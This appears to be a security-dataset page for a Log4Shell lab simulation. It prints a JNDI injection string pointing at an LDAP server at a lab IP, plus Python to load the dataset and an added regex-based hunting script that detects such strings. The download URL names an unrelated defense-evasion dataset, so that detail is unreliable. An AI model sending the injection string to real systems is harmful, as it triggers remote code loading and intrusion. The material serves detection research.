Log4jShell LDAP JNDI Lookup

Metadata

| Field | Value |
|---|---|
| Contributors | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date | 2021/12/14 |
| Modification Date | 2021/12/14 |
| Tactics | TA0001, TA0002 |
| Techniques | T1190, T1203 |
| Tags | None |

Dataset Description

The JNDI lookup feature of log4j allows variables to be retrieved via JNDI (Java Naming and Directory Interface), an API that provides naming and directory functionality to Java applications.

Simulation Metadata

Tools

| type | Name | Module |
|---|---|---|
| Manual | sh | sh |

Adversary View

java -cp target/Log4jLabProject-1.0-SNAPSHOT-all.jar com.log4jshell.App '${jndi:ldap://192.168.2.6:1389/Run}'

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

# Download the zipped dataset and extract its first member to the working directory
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/linux/defense_evasion/host/sh_binary_padding_dd.zip'
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # stop here on a failed download
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

import pandas as pd

# The dataset is JSON lines: one event per line
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.head(1)
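
Hunt for the JNDI Lookup String (added example)

The following is an added example, not part of the original dataset notebook: it scans JSON-lines events for the lookup string shown in the Adversary View and extracts the scheme, host, port and path it points at. The sample events and their field names (`Hostname`, `CommandLine`, `process.args`) are constructed assumptions, since the dataset's schema is not shown on this page.

```python
import json
import re

# Matches only the literal, un-nested form shown in the Adversary View:
# ${jndi:<scheme>://<host>[:<port>][/<path>]}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}", re.IGNORECASE)

# Constructed sample events (JSON lines); field names are assumptions.
SAMPLE_EVENTS = """\
{"Hostname": "lab-host", "CommandLine": "java -cp target/Log4jLabProject-1.0-SNAPSHOT-all.jar com.log4jshell.App ${jndi:ldap://192.168.2.6:1389/Run}"}
{"Hostname": "lab-host", "CommandLine": "ls -la /tmp"}
{"Hostname": "lab-host", "process": {"args": ["java", "-cp", "app.jar", "${jndi:ldap://192.168.2.6:1389/Run}"]}}
not-json
"""

def iter_strings(value, path=""):
    """Yield (field_path, string) for every string nested in a decoded JSON value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield from iter_strings(item, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for index, item in enumerate(value):
            yield from iter_strings(item, f"{path}[{index}]")

def scan_events(json_lines):
    """Return one finding per JNDI lookup string found in any field of any event."""
    findings = []
    for line_no, line in enumerate(json_lines.splitlines(), start=1):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the hunt
        for field, text in iter_strings(event):
            for m in JNDI_RE.finditer(text):
                findings.append({
                    "line": line_no, "field": field,
                    "scheme": m["scheme"].lower(), "host": m["host"],
                    "port": int(m["port"]) if m["port"] else None,
                    "path": m["path"] or "",
                })
    return findings

if __name__ == "__main__":
    print(json.dumps(scan_events(SAMPLE_EVENTS), indent=2))
```

The extracted host and port give a pivot for correlating outbound network connections from the same host.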